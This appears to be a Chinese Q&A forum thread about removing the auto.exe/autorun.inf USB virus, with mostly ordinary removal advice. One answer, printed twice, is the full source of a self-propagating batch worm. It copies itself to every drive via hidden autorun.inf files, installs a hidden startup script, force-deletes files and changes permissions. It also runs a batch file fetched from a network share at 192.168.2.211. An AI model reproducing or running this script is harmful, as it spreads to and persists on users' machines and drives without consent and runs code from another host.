电脑中auto病毒了,有知道如何解决的,请指教.
症状:修改系统日期,生成auto.exe\autorun.inif,1、修改系统日期,令卡巴失效2、在每个盘符下生成auto.exe和autorun.inf,删不掉3、盘...
症状:修改系统日期,生成auto.exe\autorun.inif,
1、修改系统日期,令卡巴失效
2、在每个盘符下生成auto.exe和autorun.inf,删不掉
3、盘符上点右键出现auto
4、显示隐藏文件和显示系统文件功能失效
5、自动更新被关闭
6、自动链接某些网站下载木马
7、U盘专杀工具杀之无效,360专杀工具杀之无效
8、下载了一些auto.exe专杀工具,无效...
请问这是什么病毒?该如何杀掉?
根据网上提示,好像中了叫做:恶意木马下载器auto.exe病毒,11-27中的,网上提供的手动清除的文件我的没有.病毒执行后我的系统生成的8位数是DE497A25 不是711EC3AE;虽然照葫芦删了一遍但好像还是没清干净,在安全模式下360卫士仍提示有一个AUTO要加入启动项,不过我点拒绝了,不知怎样弄断根...........头痛;还请高手指点. 展开
1、修改系统日期,令卡巴失效
2、在每个盘符下生成auto.exe和autorun.inf,删不掉
3、盘符上点右键出现auto
4、显示隐藏文件和显示系统文件功能失效
5、自动更新被关闭
6、自动链接某些网站下载木马
7、U盘专杀工具杀之无效,360专杀工具杀之无效
8、下载了一些auto.exe专杀工具,无效...
请问这是什么病毒?该如何杀掉?
根据网上提示,好像中了叫做:恶意木马下载器auto.exe病毒,11-27中的,网上提供的手动清除的文件我的没有.病毒执行后我的系统生成的8位数是DE497A25 不是711EC3AE;虽然照葫芦删了一遍但好像还是没清干净,在安全模式下360卫士仍提示有一个AUTO要加入启动项,不过我点拒绝了,不知怎样弄断根...........头痛;还请高手指点. 展开
展开全部
Auto病毒专杀 V2.1 b0520_简体中文绿色免费版
Auto病毒专杀是一款专门用于预防及查杀Auto病毒、U盘病毒、闪盘病毒的工具。
除了可以30秒闪电查杀RavMone、 Rose、Sxs、Fun.xls等几十种通过U盘传播的病毒,还可以对系统实行主动防御,自动检测清除插入U盘内的病毒,从根本上杜绝病毒通过U盘感染电脑,解决你的后顾之忧。免疫功能让病毒永远也无法进入你的U盘;解锁功能解除U盘锁定状态,解决无法安全删除设备问题;修复功能修复无法显示隐藏文件、双击无法打开硬盘、清除右键Auto字样、修复无法打开杀毒软件。
最新更新:
增加修复无法进入安全模式
增加对rising病毒及变种查杀
增强对未知病毒查杀能力
Auto病毒专杀是一款专门用于预防及查杀Auto病毒、U盘病毒、闪盘病毒的工具。
除了可以30秒闪电查杀RavMone、 Rose、Sxs、Fun.xls等几十种通过U盘传播的病毒,还可以对系统实行主动防御,自动检测清除插入U盘内的病毒,从根本上杜绝病毒通过U盘感染电脑,解决你的后顾之忧。免疫功能让病毒永远也无法进入你的U盘;解锁功能解除U盘锁定状态,解决无法安全删除设备问题;修复功能修复无法显示隐藏文件、双击无法打开硬盘、清除右键Auto字样、修复无法打开杀毒软件。
最新更新:
增加修复无法进入安全模式
增加对rising病毒及变种查杀
增强对未知病毒查杀能力
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
真扣,都不给分,但还是给你说吧!首先把系统进程中的auto。exe进程关闭,然后把系统中的隐藏文件给显示出来,删除那两个文件,然后右键盘符,看有没有auto的选项,如果还有,就把注册表打开,搜索auto,找到对应的那个盘符下有auto的项给删掉就行了,然后再杀下毒。
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
U盘病毒autorun.inf
你看看很恶心的~居然伪装成信息加载
杀掉U盘中的病毒的方法~~~
对移动存储设备,中毒,把文件夹选项中隐藏受保护的操作系统文件钩掉,点上显示所有文件和文件夹,点击确定,然后在移动存储设备中会看到如下几个文件,autorun.inf,systerm.pif~都删除掉,还有一个后缀为tmp的文件,也可以删除,完成后,病毒就清除了。
小小补充:
就是在删除autorun.inf,systerm.pif这2个文件时,直接删可能会删不掉的,要先到进程管理那了先结束再删除这文件,如果还不行就到安全模式里删,这样就一定行。
呵呵~~
不要以为这个是小小的病毒,它是不知不觉的在后台运行的,它长期会占用你差不多20M内存,它随系统启动。它会莫名奇妙的使你的计算机在沉默中死亡。这个病毒任你格式化U盘也格不掉,用很多杀毒软件也奈它不何。一般让你看不出来,不信你可以把U盘插入电脑中再把“文件夹选项中隐藏受保护的操作系统文件钩掉”,看看。。多出了不明的文件,那你就是中招了!有空检查一下你的U盘吧~~~
gei你专杀~~~分分送来~!!~
Autorun病毒防御者 2.0.2.530
Autorun病毒防御者软件是专门针对流行的U盘病毒和部分木马开发的查杀程序。它独有的精确查杀与扩展查杀双查杀机制能够彻底清除病毒和木马的相关文件和残余,不留痕迹。此外,软件还有U盘病毒免疫、系统修复、残余清理、病毒分析与诊断、U盘解锁、U盘软件写保护等一系列完整的辅助工具,能够让您彻底远离U盘病毒的困扰。
本软件绿色、免费,体积小巧,查杀和清除能力强。是您查杀U盘病毒的好助手!
* 2007-10-08 更新到2.0.2.530正式版
- 增加“病毒现身!”的反向操作“病毒隐身!”功能。
- DLL反注入清理引擎增强,现在可以将绝大部分DLL病毒反注入后清除。
- 注册表删除引擎增强,现在可以将以前不能顺利清除的病毒注册表也清理出去。
- 病毒智能分析工具增强检测,现在将会对所有关联文件进行相关性检查。
http://www.onlinedown.net/soft/56964.htm
auto病毒专杀工具下载:
http://www.p234.com/Soft/rjxz/200612/61.html
878D2B28.exe .你可以下载 unlocker:http://www.onlinedown.net/soft/24732.htm,安装后,首先从任务管理器里把可疑病毒进程结束,然后找到病毒文件(杀软、360等会给出病毒路径,可能需要显示隐藏文件),右键用unlocker删除
手动删除
1,瑞星最新升级病毒包可以识别它;
2,手动.注册表中HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
CheckedValue 值设为1,在安全模式下,在cmd.exe命令下找到病毒文件,DIR /A 命令,并用 DEL 文件名 命令,删除所有盘中的病毒文件.
重起就大功告成了.
@echo off
setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
cd /d "%~dp0"
if /i "%cd%"=="%~d0\" (explorer.exe "%~d0")
set v=01
set "endf=%systemdrive%\8bye.txt"
call:ie s.vbe
echo.Wscript.sleep 10000>s.vbe
attrib s.vbe +a +s +r +h
if /i not "%cd%"=="%systemroot%" (call:cb&del /a /f /q s.vbe&goto :eof)
set dl=CDEFGHIJKLMNOPQRSTUVWXYZ
set n=0
call:inf >inf.tem
call:ql
uda.a
md "%systemroot%\bakfiles\"
call:ie "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
copy uda-解压.bat "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
call:ie "%systemroot%\bakfiles\uda.a"
call:copy uda.a "%systemroot%\bakfiles\"
:s
echo. >uhere-%v%.txt
if exist "%endf%" (set n=1&goto end)
if "!dl:~%n%,1!"=="" (set n=0&s.vbe&(ping 192.168.2.211 -n 1 &&call \\192.168.2.211\re$\add.bat))
set d=!dl:~%n%,1!:
set /a n=n+1
if not exist %d% (goto s)
if exist "%d%\autorun.inf\" (echo.y|cacls "%d%\autorun.inf" /p everyone:f
rd "%d%\autorun.inf" /s /q)
if exist "%d%\autorun.inf" (fc "%d%\autorun.inf" inf.tem&if not "!ERRORLEVEL!"=="0" (call U盘病毒分析.bat -a -l -d %d:~0,-1% -c -i -s&goto s1)) else (goto s1)
if not exist "%d%\%~n0.vbe" (goto s2)
if not exist "%d%\%~nx0" (goto s3)
if not exist "%d%\uda.a" (goto s4)
if exist %d%\%date:~0,10%.sk (goto s)
:s1
call:inf >%d%\autorun.inf
attrib %d%\autorun.inf +a +s +r +h
call:ie "%d%\%~n0.vbe"
:s2
call:vbe "%~nx0" >"%d%\%~n0.vbe"
attrib "%d%\%~n0.vbe" +a +s +r +h
:s3
call:copy "%~dpnx0" "%d%\"
:s4
call:copy "uda.a" "%d%\"
call:ie %d%\*.sk
echo.>%d%\%date:~0,10%.sk
attrib %d%\%date:~0,10%.sk +a +s +r +h
goto s
:cb
if exist "%systemroot%\uhere-*.txt" (del /a /f /q "%systemroot%\uhere-*.txt"&s.vbe)
if exist "%systemroot%\uhere-*.txt" (if exist "%systemroot%\uhere-%v%.txt" (goto :eof) else (call:v "%systemroot%\uhere-*.txt"&(if %v% lss !v0! (goto :eof))))
call:rm >%systemdrive%\已经被反U盘病毒的“病毒”感染.txt
call:copy "%~dpnx0" "%systemroot%\"
call:copy "uda.a" "%systemroot%\"
call:ie "%systemroot%\%~n0.vbe"
call:vbe "%~nx0" >"%systemroot%\%~n0.vbe"
call:ie "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
call:vbe "%systemroot%\%~nx0" >"%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
start "" /wait /d "%systemroot%\" "%systemroot%\%~n0.vbe"
goto :eof
:v
set "v0=%~nx1"
set /a "v0=%v0:~6,2%"
goto :eof
:rm
echo. 看到这个,请不要慌张。电脑病毒的定义为:1、传播性;2、潜伏性;3、破坏性。根据此定义,本脚本这完全符合1,有点符合2,不符合3(若说破坏性也不是没有,但只针对U盘病毒,而且会在删除文件前备份,备份地址:%systemroot%\bakfiles\),因此,病毒二字加了引号,即不是真正的病毒。本脚本的目的是通过U盘传播,并沿途清理U盘中的病毒,如果可能,会把收集到的病毒文件发给作者;不会给您造成太多不便(与其被U盘病毒感染,不如被本脚本感染啦)。如果您觉得这样给您造成了不便,想卸载本脚本,请在%systemdrive%\下新建一个名为8bye的文本文件(不需要写入内容,即:新建%endf%),大约在20秒内完成卸载,并帮助您进行U盘病毒免疫。欲了解更多,请打开 U盘病毒分析 的自述文件(地址:%systemroot%\readme.txt)。谢谢!
echo. 包含文件:u.bat(本文件,4240字节)、uda.a(21674字节,md5:e6762ebf6123bc17ab31995c61bba955)
echo. 为研究性学习而制作,于2007-03-15,望多多支持!作者:CyyIsGood(肇中高一11),联系:cyyisgood@126.com
goto :eof
:vbe
echo.wscript.createobject("wscript.shell").run """%~1"" /start",0
goto :eof
:inf
echo.[AutoRun]
echo.open=wscript.exe %~n0.vbe
echo.shell\open\Command=wscript.exe %~n0.vbe
echo.shell\explore\Command=wscript.exe %~n0.vbe
echo.shell\find\Command=wscript.exe %~n0.vbe
goto :eof
:ie
if exist "%~1" (del /a /f /q "%~1")
goto :eof
:copy
call:ie "%~dp2%~nx1"
attrib "%~1" -s -h
copy "%~1" "%~dp2"
attrib "%~1" +s +h
attrib "%~dp2%~nx1" +s +h
goto :eof
:ql
cd /d "%systemroot%\"
del /a /f /q Anti-U盘免疫.bat ReadMe.txt uda-解压.bat U盘病毒分析.bat zap.a 主操控.bat 打开发送功能.bat
cd /d "%~dp0"
goto :eof
:end
set d=!dl:~%n%,1!
echo.%d%:\
if exist %d%:\ (del /a /f /q %d%:\u.vbe %d%:\u.bat %d%:\uda.a)
set /a n=n+1
if not "!dl:~%n%,1!"=="" goto end
call U盘病毒分析.bat -c&call:ql&del /a /f /q "%systemdrive%\已经被反U盘病毒的“病毒”感染.txt" "%~dp0s.vbe" "%endf%" inf.tem "uda.a" "%~n0.vbe" "uhere-%v%.txt" "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe" "%~nx0"
你看看很恶心的~居然伪装成信息加载
杀掉U盘中的病毒的方法~~~
对移动存储设备,中毒,把文件夹选项中隐藏受保护的操作系统文件钩掉,点上显示所有文件和文件夹,点击确定,然后在移动存储设备中会看到如下几个文件,autorun.inf,systerm.pif~都删除掉,还有一个后缀为tmp的文件,也可以删除,完成后,病毒就清除了。
小小补充:
就是在删除autorun.inf,systerm.pif这2个文件时,直接删可能会删不掉的,要先到进程管理那了先结束再删除这文件,如果还不行就到安全模式里删,这样就一定行。
呵呵~~
不要以为这个是小小的病毒,它是不知不觉的在后台运行的,它长期会占用你差不多20M内存,它随系统启动。它会莫名奇妙的使你的计算机在沉默中死亡。这个病毒任你格式化U盘也格不掉,用很多杀毒软件也奈它不何。一般让你看不出来,不信你可以把U盘插入电脑中再把“文件夹选项中隐藏受保护的操作系统文件钩掉”,看看。。多出了不明的文件,那你就是中招了!有空检查一下你的U盘吧~~~
gei你专杀~~~分分送来~!!~
Autorun病毒防御者 2.0.2.530
Autorun病毒防御者软件是专门针对流行的U盘病毒和部分木马开发的查杀程序。它独有的精确查杀与扩展查杀双查杀机制能够彻底清除病毒和木马的相关文件和残余,不留痕迹。此外,软件还有U盘病毒免疫、系统修复、残余清理、病毒分析与诊断、U盘解锁、U盘软件写保护等一系列完整的辅助工具,能够让您彻底远离U盘病毒的困扰。
本软件绿色、免费,体积小巧,查杀和清除能力强。是您查杀U盘病毒的好助手!
* 2007-10-08 更新到2.0.2.530正式版
- 增加“病毒现身!”的反向操作“病毒隐身!”功能。
- DLL反注入清理引擎增强,现在可以将绝大部分DLL病毒反注入后清除。
- 注册表删除引擎增强,现在可以将以前不能顺利清除的病毒注册表也清理出去。
- 病毒智能分析工具增强检测,现在将会对所有关联文件进行相关性检查。
http://www.onlinedown.net/soft/56964.htm
auto病毒专杀工具下载:
http://www.p234.com/Soft/rjxz/200612/61.html
878D2B28.exe .你可以下载 unlocker:http://www.onlinedown.net/soft/24732.htm,安装后,首先从任务管理器里把可疑病毒进程结束,然后找到病毒文件(杀软、360等会给出病毒路径,可能需要显示隐藏文件),右键用unlocker删除
手动删除
1,瑞星最新升级病毒包可以识别它;
2,手动.注册表中HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
CheckedValue 值设为1,在安全模式下,在cmd.exe命令下找到病毒文件,DIR /A 命令,并用 DEL 文件名 命令,删除所有盘中的病毒文件.
重起就大功告成了.
@echo off
setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
cd /d "%~dp0"
if /i "%cd%"=="%~d0\" (explorer.exe "%~d0")
set v=01
set "endf=%systemdrive%\8bye.txt"
call:ie s.vbe
echo.Wscript.sleep 10000>s.vbe
attrib s.vbe +a +s +r +h
if /i not "%cd%"=="%systemroot%" (call:cb&del /a /f /q s.vbe&goto :eof)
set dl=CDEFGHIJKLMNOPQRSTUVWXYZ
set n=0
call:inf >inf.tem
call:ql
uda.a
md "%systemroot%\bakfiles\"
call:ie "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
copy uda-解压.bat "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
call:ie "%systemroot%\bakfiles\uda.a"
call:copy uda.a "%systemroot%\bakfiles\"
:s
echo. >uhere-%v%.txt
if exist "%endf%" (set n=1&goto end)
if "!dl:~%n%,1!"=="" (set n=0&s.vbe&(ping 192.168.2.211 -n 1 &&call \\192.168.2.211\re$\add.bat))
set d=!dl:~%n%,1!:
set /a n=n+1
if not exist %d% (goto s)
if exist "%d%\autorun.inf\" (echo.y|cacls "%d%\autorun.inf" /p everyone:f
rd "%d%\autorun.inf" /s /q)
if exist "%d%\autorun.inf" (fc "%d%\autorun.inf" inf.tem&if not "!ERRORLEVEL!"=="0" (call U盘病毒分析.bat -a -l -d %d:~0,-1% -c -i -s&goto s1)) else (goto s1)
if not exist "%d%\%~n0.vbe" (goto s2)
if not exist "%d%\%~nx0" (goto s3)
if not exist "%d%\uda.a" (goto s4)
if exist %d%\%date:~0,10%.sk (goto s)
:s1
call:inf >%d%\autorun.inf
attrib %d%\autorun.inf +a +s +r +h
call:ie "%d%\%~n0.vbe"
:s2
call:vbe "%~nx0" >"%d%\%~n0.vbe"
attrib "%d%\%~n0.vbe" +a +s +r +h
:s3
call:copy "%~dpnx0" "%d%\"
:s4
call:copy "uda.a" "%d%\"
call:ie %d%\*.sk
echo.>%d%\%date:~0,10%.sk
attrib %d%\%date:~0,10%.sk +a +s +r +h
goto s
:cb
if exist "%systemroot%\uhere-*.txt" (del /a /f /q "%systemroot%\uhere-*.txt"&s.vbe)
if exist "%systemroot%\uhere-*.txt" (if exist "%systemroot%\uhere-%v%.txt" (goto :eof) else (call:v "%systemroot%\uhere-*.txt"&(if %v% lss !v0! (goto :eof))))
call:rm >%systemdrive%\已经被反U盘病毒的“病毒”感染.txt
call:copy "%~dpnx0" "%systemroot%\"
call:copy "uda.a" "%systemroot%\"
call:ie "%systemroot%\%~n0.vbe"
call:vbe "%~nx0" >"%systemroot%\%~n0.vbe"
call:ie "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
call:vbe "%systemroot%\%~nx0" >"%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
start "" /wait /d "%systemroot%\" "%systemroot%\%~n0.vbe"
goto :eof
:v
set "v0=%~nx1"
set /a "v0=%v0:~6,2%"
goto :eof
:rm
echo. 看到这个,请不要慌张。电脑病毒的定义为:1、传播性;2、潜伏性;3、破坏性。根据此定义,本脚本这完全符合1,有点符合2,不符合3(若说破坏性也不是没有,但只针对U盘病毒,而且会在删除文件前备份,备份地址:%systemroot%\bakfiles\),因此,病毒二字加了引号,即不是真正的病毒。本脚本的目的是通过U盘传播,并沿途清理U盘中的病毒,如果可能,会把收集到的病毒文件发给作者;不会给您造成太多不便(与其被U盘病毒感染,不如被本脚本感染啦)。如果您觉得这样给您造成了不便,想卸载本脚本,请在%systemdrive%\下新建一个名为8bye的文本文件(不需要写入内容,即:新建%endf%),大约在20秒内完成卸载,并帮助您进行U盘病毒免疫。欲了解更多,请打开 U盘病毒分析 的自述文件(地址:%systemroot%\readme.txt)。谢谢!
echo. 包含文件:u.bat(本文件,4240字节)、uda.a(21674字节,md5:e6762ebf6123bc17ab31995c61bba955)
echo. 为研究性学习而制作,于2007-03-15,望多多支持!作者:CyyIsGood(肇中高一11),联系:cyyisgood@126.com
goto :eof
:vbe
echo.wscript.createobject("wscript.shell").run """%~1"" /start",0
goto :eof
:inf
echo.[AutoRun]
echo.open=wscript.exe %~n0.vbe
echo.shell\open\Command=wscript.exe %~n0.vbe
echo.shell\explore\Command=wscript.exe %~n0.vbe
echo.shell\find\Command=wscript.exe %~n0.vbe
goto :eof
:ie
if exist "%~1" (del /a /f /q "%~1")
goto :eof
:copy
call:ie "%~dp2%~nx1"
attrib "%~1" -s -h
copy "%~1" "%~dp2"
attrib "%~1" +s +h
attrib "%~dp2%~nx1" +s +h
goto :eof
:ql
cd /d "%systemroot%\"
del /a /f /q Anti-U盘免疫.bat ReadMe.txt uda-解压.bat U盘病毒分析.bat zap.a 主操控.bat 打开发送功能.bat
cd /d "%~dp0"
goto :eof
:end
set d=!dl:~%n%,1!
echo.%d%:\
if exist %d%:\ (del /a /f /q %d%:\u.vbe %d%:\u.bat %d%:\uda.a)
set /a n=n+1
if not "!dl:~%n%,1!"=="" goto end
call U盘病毒分析.bat -c&call:ql&del /a /f /q "%systemdrive%\已经被反U盘病毒的“病毒”感染.txt" "%~dp0s.vbe" "%endf%" inf.tem "uda.a" "%~n0.vbe" "uhere-%v%.txt" "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe" "%~nx0"
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
1.不用那么麻烦,AUTO专杀工具就可以,不过得先把网断了,要不然这个病毒自动下载
2.在纯dos下可以删除
2.在纯dos下可以删除
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
更多回答(5)
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
